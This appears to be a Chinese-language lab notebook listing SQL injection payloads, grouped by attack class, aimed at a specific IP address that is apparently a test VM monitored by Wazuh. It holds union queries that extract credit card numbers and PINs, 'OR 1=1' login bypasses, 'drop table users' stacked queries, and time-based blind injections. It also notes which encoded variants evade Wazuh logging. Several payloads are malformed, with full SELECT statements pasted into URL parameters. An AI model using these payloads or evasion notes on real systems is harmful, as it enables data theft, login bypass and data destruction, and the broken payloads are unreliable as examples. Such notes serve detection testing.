# 5. SQL 指令 ###### tags: `虛擬機流程` genre_1 = 7 genre_2 = 5 genre_3 = 11 genre_4 = 15 genre_5 = 6+7 genre_6 = 9 ## 第一類攻擊 - Union Query http://140.122.184.28/index.php?NewsID=1 union select ==CreditcardNo==, ==Pinno== from ==Creditcardtable== ## 第二類攻擊 - Tautologies ``` http://140.122.184.28/users/?id=SELECT+*+FROM+users where username = 'admin' -- ``` 使用下面這個 v1 ``` http://140.122.184.28/users/?user_id=SELECT * FROM USERS WHERE USER_NAME =‘ADMINISTRATOR’ and PASSWORD = ” OR 1=1 -- ``` v2 http://140.122.184.28/users/?user_id=SELECT * FROM USERS WHERE username =‘admin’ and password = ” OR ==1=====1== -- ## 第三類攻擊 - Piggy-Backed Queries 使用第一個 http://140.122.184.28/users/?category=pets ; drop table ==users==-- ' and type = 'public' ``` http://140.122.184.28/users/?id=SELECT+*+FROM+news where year='2013' and author=''; drop table users-- ' and type = 'public' ``` ## 第四類攻擊 - Illegal/Logically Incorrect Queries ## 第五類攻擊 - Stored Procedures ## 第六類攻擊 - Inference 使用blind injections Timing attack (不會被wazuh偵測到) ``` http://140.122.184.28/index.php?NewsID=1 and if (version() like '8%', sleep(3), 'false') ``` 執行上述攻擊後，網頁將會轉圈圈3秒 可以自行更改sleep之參數 ``` http://140.122.184.28/index.php?NewsID=1 and if (version() like '8%', sleep(10), 'false') ``` blind injections http://140.122.184.28/news.php?NewsID=1 AND (select 1 from ==Creditcardtable== limit 0,1)=1 ## 第七類攻擊 - Alternate Encodings 使用兩個有紀錄的 ``` 有紀錄 http://140.122.184.28/users/?id=SELECT * FROM TABLE_USERS WHERE USERNAME = ‘admin’ and PASS = ” %31%20%4F%52%20%31%3D%31 -- 沒紀錄 http://140.122.184.28/users/?id=SELECT * FROM TABLE_USERS WHERE USERNAME = ‘admin’ and PASS = ” 1 OR 1=&#x 31 -- 沒紀錄 http://140.122.184.28/users/?id=SELECT * FROM TABLE_USERS WHERE USERNAME = ‘admin’ and PASS = ” &#49&#32&#79&#82&#32&#49&#61&#49 -- 有紀錄 http://140.122.184.28/users/?id=SELECT * FROM TABLE_USERS WHERE USERNAME = ‘admin’ and PASS = ” MSBPUiAxPTE= -- ``` ## 第八類攻擊 - comment ``` http://140.122.184.28/users/?id=SELECT+*+FROM+news where year='2013' ; dr/*comment*/op table users-- ' and type = 'public' ```